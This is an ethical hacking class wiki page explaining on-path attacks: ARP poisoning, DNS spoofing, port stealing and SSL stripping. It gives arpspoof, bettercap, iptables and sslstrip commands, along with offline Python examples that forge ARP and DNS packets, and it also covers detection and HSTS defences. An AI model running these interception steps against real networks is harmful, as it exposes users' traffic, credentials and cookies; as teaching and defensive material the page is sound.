Class 3 - On-Path Attacks - Justin-Boyd/Ethical-Hacking-Class GitHub Wiki

On-Path

What are On-Path Attacks?

  • On-Path (Man-in-the-Middle) attacks are based on eavesdropping on the communication between two parties.
  • Used to obtain information secretly.
  • Gives the attacker control over the traffic: it can be read, modified, dropped or injected, not only observed.

On-Path Positioning

  • Wireless networks hand out an On-Path position almost automatically: anyone in radio range can capture frames, and a rogue or "evil twin" access point places the attacker directly between the client and the network.
  • LANs require a connection to the segment (a physical port, a compromised host or a planted device), and because a switch only delivers a frame to the port that owns its destination MAC, the attacker still needs ARP poisoning or port stealing to see other hosts' traffic.

Execution Steps

  1. The attacking machine places itself between two computers that are communicating with each other.
  2. The victims get no indication that their communication is being intercepted.
  3. Potentially sensitive information about the client is collected for as long as the communication continues.

ARP Poisoning

Address Resolution Protocol

  • ARP resolves IPv4 addresses to MAC addresses.
  • Layer 2 protocol used on LANs.
  • A host broadcasts an ARP request ("who has 10.0.0.1?") and the owner of that address answers with a unicast reply ("10.0.0.1 is at 00:11:22:33:44:01").
  • Resolved mappings are cached in the host's ARP table so the exchange is not repeated for every packet; an entry is overwritten by any later reply for the same IP.

ARP Table

  • The command arp -a displays the ARP table on Windows machines (it also works on macOS and on Linux with net-tools; the modern Linux equivalent is ip neigh).

ARP Poisoning Process

  • Exploits the lack of validation in ARP: a host accepts replies it never asked for and overwrites the existing entry for that IP.
  • The attacker forges ARP reply packets claiming that the victim's peer (typically the default gateway) is at the attacker's MAC address.
  • The forged replies are sent to the victim (and, for a two-way attack, to the gateway with the victim's IP).
  • The ARP tables of the poisoned nodes are updated, so frames for the spoofed IP are now delivered to the attacker's NIC.

Arpspoof

  • Arpspoof (part of the dsniff package) is a tool used to execute an ARP poisoning attack.
  • The forged reply is sent repeatedly (every couple of seconds) so the false entry is not aged out or overwritten by the legitimate host's own replies.
  • The victim's ARP table is updated with the false entry and its traffic for the spoofed IP flows to the attacker.
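The forged reply arpspoof sends, and what it looks like from the victim's ARP table, as an added Python example (not code from the page, from dsniff or from the class). It builds the ARP-over-Ethernet frames at byte level with the standard library only, so it runs offline without scapy and without sending anything; the lab addresses (10.0.0.1 gateway, 10.0.0.5 victim, 10.0.0.66 attacker) are assumptions. The ArpCache class is the defender's side: the same change-of-MAC and shared-MAC checks a tool like arpwatch, or a comparison of two arp -a listings, would use.

```python
import struct

ETH_TYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

# Constructed lab addresses (assumptions for the example, not from the page).
GATEWAY_IP, GATEWAY_MAC = "10.0.0.1", "00:11:22:33:44:01"
VICTIM_IP, VICTIM_MAC = "10.0.0.5", "00:11:22:33:44:05"
ATTACKER_IP, ATTACKER_MAC = "10.0.0.66", "de:ad:be:ef:00:99"


def mac_bytes(mac): return bytes(int(x, 16) for x in mac.split(":"))
def ip_bytes(ip): return bytes(int(x) for x in ip.split("."))
def mac_str(b): return ":".join(f"{x:02x}" for x in b)
def ip_str(b): return ".".join(str(x) for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet frame carrying an ARP packet. A reply asserts 'sender_ip is at sender_mac'."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_TYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)  # Ethernet, IPv4, hlen 6, plen 4, opcode
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip) + mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Decode an ARP-over-Ethernet frame into its fields; None for anything else."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_TYPE_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"op": op,
            "sender_mac": mac_str(frame[22:28]), "sender_ip": ip_str(frame[28:32]),
            "target_mac": mac_str(frame[32:38]), "target_ip": ip_str(frame[38:42])}


def poison_frames(attacker_mac, victim_mac, victim_ip, gateway_mac, gateway_ip):
    """The pair of unsolicited replies that 'arpspoof -i eth0 -t VICTIM -r GATEWAY' keeps resending:
    the victim is told the gateway lives at the attacker's MAC, the gateway is told the same about the victim."""
    return [build_arp(ARP_REPLY, attacker_mac, gateway_ip, victim_mac, victim_ip),
            build_arp(ARP_REPLY, attacker_mac, victim_ip, gateway_mac, gateway_ip)]


class ArpCache:
    """A host's ARP table plus an arpwatch-style check: an IP whose MAC changes is flagged."""

    def __init__(self):
        self.table, self.alerts = {}, []

    def observe(self, frame):
        p = parse_arp(frame)
        if p is None or p["op"] != ARP_REPLY:
            return
        ip, mac = p["sender_ip"], p["sender_mac"]
        old = self.table.get(ip)
        if old is not None and old != mac:
            self.alerts.append(f"{ip} moved from {old} to {mac}")
        self.table[ip] = mac  # no validation: the latest reply always wins


def shared_macs(table):
    """IPs that share one MAC in a table: the classic sign in arp -a output of a poisoned host."""
    by_mac = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def demo():
    """Victim's and gateway's view: legitimate replies first, then arpspoof -r's forged pair."""
    victim, gateway = ArpCache(), ArpCache()
    victim.observe(build_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP))
    gateway.observe(build_arp(ARP_REPLY, VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP))
    gateway.observe(build_arp(ARP_REPLY, ATTACKER_MAC, ATTACKER_IP, GATEWAY_MAC, GATEWAY_IP))
    to_victim, to_gateway = poison_frames(ATTACKER_MAC, VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP)
    victim.observe(to_victim)
    gateway.observe(to_gateway)
    return victim.table, victim.alerts, shared_macs(gateway.table)


if __name__ == "__main__":
    print(demo())
```

After the forged reply the victim's table maps the gateway IP to the attacker's MAC, and on the gateway the attacker's MAC now appears behind two IPs; both are visible with nothing more than arp -a before and after.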

Enable Forwarding

echo 1 > /proc/sys/net/ipv4/ip_forward
  1. echo outputs the text value passed as an argument.
  2. 1 is the value (0 turns forwarding off again).
  3. '>' is shell redirection: it writes the output into the file instead of the terminal.
  4. /proc/sys/net/ipv4/ip_forward is the kernel's IPv4 forwarding switch (sysctl -w net.ipv4.ip_forward=1 does the same thing; both need root).
  • The command makes the attacker behave like a router: packets it receives that are addressed to other hosts are forwarded to their real destination instead of being dropped. Without it the poisoned victim loses connectivity, and the attack turns into an obvious denial of service instead of silent interception.

Arpspoof Command

arpspoof -i [interface] -t [victim IP] -r [target IP]

  • Arpspoof command parameters:
    • -i [interface] – the NIC to send the forged replies on (for example eth0)
    • -t [victim IP] – the host whose ARP table is poisoned
    • [target IP] – the IP the attacker impersonates towards the victim, typically the default gateway
    • -r – also poison the target so that both directions of the victim-to-gateway traffic pass through the attacker (optional; only valid together with -t)

DNS Poisoning

DNS Poisoning Process

  • Use ARP poisoning to position the attacker's machine between the victim and the path to its DNS resolver (usually via the gateway).
  • Define the spoof mapping: which domain names should resolve to which IP, either in a hosts-style file or as tool parameters.
  • Capture the victim's DNS request as it passes through the attacker.
  • Answer it with a forged DNS response that copies the request's transaction ID and question and points the name at the attacker-controlled IP; the victim's resolver accepts the first matching answer, so the forged one must arrive before the real one.

Hosts File

  • Exists on practically every computer (/etc/hosts on Linux and macOS, C:\Windows\System32\drivers\etc\hosts on Windows).
  • Contains records of the form "IP address  domain name [aliases]".
  • Used to resolve domain names to IP addresses before DNS is consulted; the same "IP name" syntax is what spoofing tools such as dnsspoof (-f file) and bettercap (dns.spoof.hosts) read to learn which names to hijack and where to send them.

Bettercap

  • A tool used for On-Path attacks (network reconnaissance, ARP and DNS spoofing, HTTP/HTTPS proxying and more, driven by modules from one interactive session).
  • Can initiate ARP poisoning and DNS spoofing at the same time.
  • Watches DNS queries from the poisoned victim and sends false DNS responses, racing the real server's reply.

Bettercap ARP Poisoning

set arp.spoof.targets [victim IP]
arp.spoof on

  • Bettercap ARP command parameters:
    • set – assigns a value to a module parameter
    • arp.spoof.targets – comma-separated IPs (or MACs) to poison; the parameter name is plural, and it defaults to the whole subnet if left unset
    • arp.spoof.fullduplex – set to true to also poison the gateway, the equivalent of arpspoof -r
    • arp.spoof on – starts the module (arp.spoof off stops it and restores the real entries)

Bettercap DNS Poisoning

set dns.spoof.domains [domain]; set dns.spoof.address [target IP]
dns.spoof on

  • Bettercap DNS command parameters:
    • set – assigns a value to a module parameter
    • dns.spoof.domains – comma-separated list of website domains to be spoofed
    • dns.spoof.address – the IP address returned in the forged answers (defaults to the attacker's interface address)
    • dns.spoof.all – answer every query instead of only the listed domains; dns.spoof.hosts – read the name-to-IP mappings from a hosts-format file instead

DNS Poisoning Result

  • When victims try to browse to www.yahoo.com, they may end up elsewhere …
  • If the real site is served over HTTPS, the attacker's server cannot present a valid certificate for that name, so the browser shows a certificate warning. DNS poisoning on its own does not defeat TLS, which is why it is combined with SSL stripping below.
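A worked DNS spoof in Python, added here as an example rather than code from the page or from bettercap/dnsspoof: a hosts-format spoof list is parsed, a victim's A query is decoded, and a forged response is built that copies the transaction ID and question so a stub resolver accepts it. Everything is standard-library byte handling and runs offline; the spoof list, the attacker address 10.0.0.66 and the wildcard convention (*.example.com matches subdomains, as dnsspoof's hosts file does) are assumptions for the example.

```python
import struct

# Constructed hosts-style spoof list (an assumption for the example, not from the page):
# the attacker's web server sits at 10.0.0.66.
SPOOF_HOSTS = """
# ip         names to hijack
10.0.0.66    www.yahoo.com
10.0.0.66    *.example.com
"""


def load_hosts(text):
    """Parse '<ip> <name> [<name>...]' lines, ignoring '#' comments; returns [(pattern, ip), ...]."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        rules.extend((n.lower().rstrip("."), ip) for n in names)
    return rules


def lookup(rules, qname):
    """First matching rule wins; '*.example.com' matches any subdomain (dnsspoof-style wildcard)."""
    qname = qname.lower().rstrip(".")
    for pat, ip in rules:
        if pat == qname or (pat.startswith("*.") and qname.endswith(pat[1:])):
            return ip
    return None


def encode_name(name):
    out = b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split("."))
    return out + b"\x00"


def decode_name(msg, off):
    """Decode a DNS name at msg[off], following a 0xC0 compression pointer. Returns (name, next offset)."""
    labels = []
    while True:
        n = msg[off]; off += 1
        if n == 0:
            break
        if n & 0xC0 == 0xC0:  # pointer to an earlier copy of the name
            ptr = ((n & 0x3F) << 8) | msg[off]
            labels.append(decode_name(msg, ptr)[0])
            return ".".join(labels), off + 1
        labels.append(msg[off:off + n].decode()); off += n
    return ".".join(labels), off


def build_query(txid, qname, qtype=1):
    """A client's query as it leaves the victim: header with RD set, one question."""
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + encode_name(qname) + struct.pack("!HH", qtype, 1)


def parse_query(msg):
    txid = struct.unpack("!H", msg[:2])[0]
    qname, off = decode_name(msg, 12)
    qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
    return {"id": txid, "qname": qname, "qtype": qtype, "qclass": qclass, "question": msg[12:off + 4]}


def forge_response(query, spoof_ip, ttl=300):
    """The forged answer: same transaction ID and question as the query (besides the UDP ports, that is all a
    stub resolver checks) and one A record pointing at spoof_ip. Non-A queries are left to the real server."""
    q = parse_query(query)
    if (q["qtype"], q["qclass"]) != (1, 1):
        return None
    header = struct.pack("!HHHHHH", q["id"], 0x8180, 1, 1, 0, 0)  # QR=1 RD=1 RA=1, 1 question, 1 answer
    rdata = bytes(int(x) for x in spoof_ip.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, len(rdata)) + rdata  # name = pointer to offset 12
    return header + q["question"] + answer


def parse_response(msg):
    txid, flags, qd, an = struct.unpack("!HHHH", msg[:8])
    _, off = decode_name(msg, 12); off += 4  # skip the echoed question
    answers = []
    for _ in range(an):
        name, off = decode_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10]); off += 10
        rdata, off = msg[off:off + rdlen], off + rdlen
        if rtype == 1:
            answers.append((name, ".".join(str(b) for b in rdata)))
    return {"id": txid, "flags": flags, "answers": answers}


def make_spoofer(rules):
    """Returns handle(query) -> forged response bytes, or None when the name is not targeted
    (then nothing is sent and the real server's reply reaches the victim as usual)."""
    def handle(query):
        ip = lookup(rules, parse_query(query)["qname"])
        return forge_response(query, ip) if ip else None
    return handle


if __name__ == "__main__":
    handle = make_spoofer(load_hosts(SPOOF_HOSTS))
    print(parse_response(handle(build_query(0x1234, "www.yahoo.com"))))
```

In a live attack the victim's real query is still forwarded (ip_forward is on), so the genuine answer arrives too; the spoof only works because the forged packet, sent from the On-Path position, gets there first and the resolver discards the later duplicate.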

Port Stealing

What is Port Stealing?

  • Poisons the switch's forwarding (CAM) table, which maps MAC addresses to switch ports.
  • Uses the victim's MAC address as the source of frames the attacker sends, so the switch relearns that MAC on the attacker's port.
  • Works only on switched LANs, because it targets the switch rather than the hosts' ARP tables.
  • Can cause a delay or packet loss: the victim only receives traffic during the moments its real port entry is restored.

Port Stealing Process

  • May be executed when ARP poisoning does not work, for example against hosts with static ARP entries.
  • Floods the switch with Layer 2 frames that carry the victim's MAC address as the source.
  • Those frames are addressed to the attacker's own MAC, so the switch delivers them straight back to the attacker instead of flooding them to other ports. Every frame the switch then receives for the victim lands on the attacker's port; the attacker sends an ARP request to the victim so that its reply restores the real port, forwards the captured frame, and starts flooding again.
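A small switch model, added as an example (not from the page or from any tool), that shows why port stealing works and why it costs the victim packets: a learning switch trusts every frame's source MAC, so frames sent from the victim's MAC on the attacker's port move the victim's CAM entry. The port layout and MAC addresses are assumptions.

```python
FLOOD = "flood"  # unknown or broadcast destination: sent out of every port
BROADCAST = "ff:ff:ff:ff:ff:ff"


class Switch:
    """Learning switch model: each frame teaches 'source MAC is on ingress port'; the destination MAC is
    looked up in that CAM table, unknown or broadcast destinations are flooded. Nothing verifies the source."""

    def __init__(self):
        self.cam = {}

    def forward(self, src, dst, ingress):
        """Returns the port (or FLOOD) the frame is sent out of."""
        self.cam[src] = ingress
        if dst == BROADCAST:
            return FLOOD
        return self.cam.get(dst, FLOOD)


# Constructed lab layout (assumption): gateway on port 1, victim on port 2, attacker on port 3.
GW, VICTIM, ATTACKER = "00:00:00:00:00:01", "00:00:00:00:00:02", "00:00:00:00:00:03"
GW_PORT, VICTIM_PORT, ATTACKER_PORT = 1, 2, 3


def steal_port(sw, count=3):
    """Flood frames with source = victim's MAC and destination = attacker's own MAC: the switch relearns the
    victim on the attacker's port and the frames go nowhere else. Returns the port now held for the victim."""
    for _ in range(count):
        sw.forward(VICTIM, ATTACKER, ATTACKER_PORT)
    return sw.cam[VICTIM]


def restore_victim(sw):
    """Provoke a frame from the victim so its CAM entry snaps back: the attacker broadcasts an ARP request for
    the victim's IP (flooded, so it reaches port 2) and the victim's reply is learnt on its real port."""
    sw.forward(ATTACKER, BROADCAST, ATTACKER_PORT)
    sw.forward(VICTIM, ATTACKER, VICTIM_PORT)
    return sw.cam[VICTIM]


def demo():
    sw = Switch()
    sw.forward(GW, BROADCAST, GW_PORT)
    sw.forward(VICTIM, GW, VICTIM_PORT)
    sw.forward(ATTACKER, GW, ATTACKER_PORT)
    normal = sw.forward(GW, VICTIM, GW_PORT)          # 2: the victim gets the gateway's frame
    steal_port(sw)
    stolen = sw.forward(GW, VICTIM, GW_PORT)          # 3: the same frame now lands on the attacker
    restore_victim(sw)
    relayed = sw.forward(GW, VICTIM, ATTACKER_PORT)   # 2: attacker re-sends the captured frame; victim gets it late
    # Side effect of relaying with the original source MAC: the switch briefly learns the gateway on the
    # attacker's port until the gateway's next frame corrects it. This steal/restore churn is the delay and
    # packet loss the page mentions.
    return normal, stolen, relayed, sw.cam[GW]


if __name__ == "__main__":
    print(demo())
```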

SSL Stripping

What is SSL Stripping?

  • Almost all websites use HTTPS, but a user who types a bare hostname still starts with a plain HTTP request unless the browser already knows to upgrade it.
  • Data on the HTTPS connection is protected with TLS encryption, so an On-Path attacker sees only ciphertext.
  • SSL stripping downgrades HTTPS to HTTP for the victim only: the attacker keeps the HTTPS connection to the server and relays a plain-HTTP copy to the victim, rewriting https:// links and redirects to http://.
  • Provides the attacker with a plain-text view of the data, including credentials and cookies.

SSL Stripping Process

  • The client contacts the web server with a plain HTTP request (for example after typing example.com without a scheme).
  • The server redirects the client to the HTTPS URL (301/302) and creates the TLS session there.
  • The attacker intercepts the redirect, follows it to the server over HTTPS itself, and relays the content to the client over HTTP, rewriting links and removing the Secure flag from cookies so the session keeps working in the clear.

  • The attack requires IP forwarding and an On-Path position (ARP poisoning), so that the victim's traffic passes through the attacker.
  • Port redirection is used to divert the victim's port-80 traffic to the local port on which sslstrip listens.
  • The sslstrip tool does the HTTPS-to-HTTP rewriting.

iptables Command

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
  1. iptables - the Linux packet-filter and NAT administration tool (needs root)
  2. -t nat - operates on the NAT table
  3. -A PREROUTING - appends a rule to the PREROUTING chain, which is evaluated on packets as they arrive, before routing
  4. -p tcp - match TCP only
  5. --destination-port 80 - match packets sent to port 80, i.e. plain HTTP (--dport 80 is the short form)
  6. -j REDIRECT - the action: redirect the packet to a local port on this machine
  7. --to-port 8080 - the local port to redirect to
  • The command redirects the forwarded port-80 traffic to port 8080 on the attacker's machine. Undo it afterwards with the same command using -D in place of -A.

sslstrip Command

sslstrip -l 8080
  • sslstrip - activates the tool
  • -l 8080 - the port to listen on (must match the --to-port value of the iptables rule)
  • The command starts sslstrip listening on port 8080; add -w <file> to write the captured traffic to a log.

SSL Strip Result

  • The victim browses over plain HTTP once sslstrip is running (the website no longer shows the lock icon and the address starts with http://).

SSL Strip Process

  • The left panel in the example shows the result of a stripped request.
  • The right panel shows a regular HTTPS request.
  • HSTS (the Strict-Transport-Security header) should be used to defend against SSL stripping: once a browser has seen the header from a host over HTTPS, or the host is on the browser's preload list, it refuses to send plain HTTP to that host, so there is no HTTP request for sslstrip to intercept. Browsers' HTTPS-only / HTTPS-first modes close the same gap for hosts that have not set the header.
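The stripping and the HSTS defence side by side, as an added Python example (not sslstrip's code or the page's): strip_response does to a server response what an sslstrip-style proxy does before relaying it over plain HTTP, and Browser models only the HSTS cache of a browser. The server response, the host name and the preload list are constructed for the example.

```python
import re

# Constructed response the real server sends over HTTPS (an assumption for the example, not from the page).
SERVER_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Location: https://www.example.com/login\r\n"
    "Strict-Transport-Security: max-age=31536000\r\n"
    "Set-Cookie: session=abc123; Path=/; Secure; HttpOnly\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 46\r\n"
    "\r\n"
    '<a href="https://www.example.com/login">go</a>'
)


def strip_response(raw):
    """What the stripping proxy does to a response it fetched over HTTPS before relaying it to the victim over
    HTTP: downgrade redirects and links to http://, drop the HSTS header, remove the Secure cookie flag (a Secure
    cookie would never be sent back over plain HTTP and the session would break) and fix Content-Length."""
    head, sep, body = raw.partition("\r\n\r\n")
    body = body.replace("https://", "http://")
    status, *headers = head.split("\r\n")
    out = [status]
    for h in headers:
        name, _, value = h.partition(":")
        key, value = name.strip(), value.strip()
        low = key.lower()
        if low == "strict-transport-security":
            continue
        if low == "location":
            value = value.replace("https://", "http://", 1)
        elif low == "set-cookie":
            value = re.sub(r";\s*secure\b", "", value, flags=re.I)
        elif low == "content-length":
            value = str(len(body.encode()))
        out.append(f"{key}: {value}")
    return "\r\n".join(out) + sep + body


class Browser:
    """Just the HSTS part of a browser: hosts that must only be contacted over HTTPS, seeded from the preload
    list and grown from Strict-Transport-Security headers received over HTTPS (never over HTTP, RFC 6797)."""

    def __init__(self, preload=()):
        self.hsts = set(preload)

    def scheme_for(self, host, typed="http"):
        return "https" if host in self.hsts else typed

    def receive(self, host, scheme, raw):
        m = re.search(r"^strict-transport-security:\s*max-age=(\d+)", raw, re.I | re.M)
        if scheme == "https" and m and int(m.group(1)) > 0:
            self.hsts.add(host)


def visit(browser, host, typed_scheme, attacker_on_path, server_response=SERVER_RESPONSE):
    """One request/response round trip. Returns (scheme the browser actually used, response it saw)."""
    scheme = browser.scheme_for(host, typed_scheme)
    if scheme == "http" and attacker_on_path:
        seen = strip_response(server_response)  # attacker fetched the page over HTTPS, relays a stripped copy
    else:
        seen = server_response  # HTTPS end to end, or no attacker: the server's own response arrives
    browser.receive(host, scheme, seen)
    return scheme, seen


if __name__ == "__main__":
    print(visit(Browser(), "www.example.com", "http", attacker_on_path=True)[1])
    print(visit(Browser(preload=["www.example.com"]), "www.example.com", "http", attacker_on_path=True)[0])
```

The fresh browser that types http:// sees the stripped page and never learns HSTS, because the header only counts when received over HTTPS; the browser with the host preloaded (or that completed one clean HTTPS visit earlier) upgrades before sending anything, so the attacker has no plain-HTTP request to rewrite.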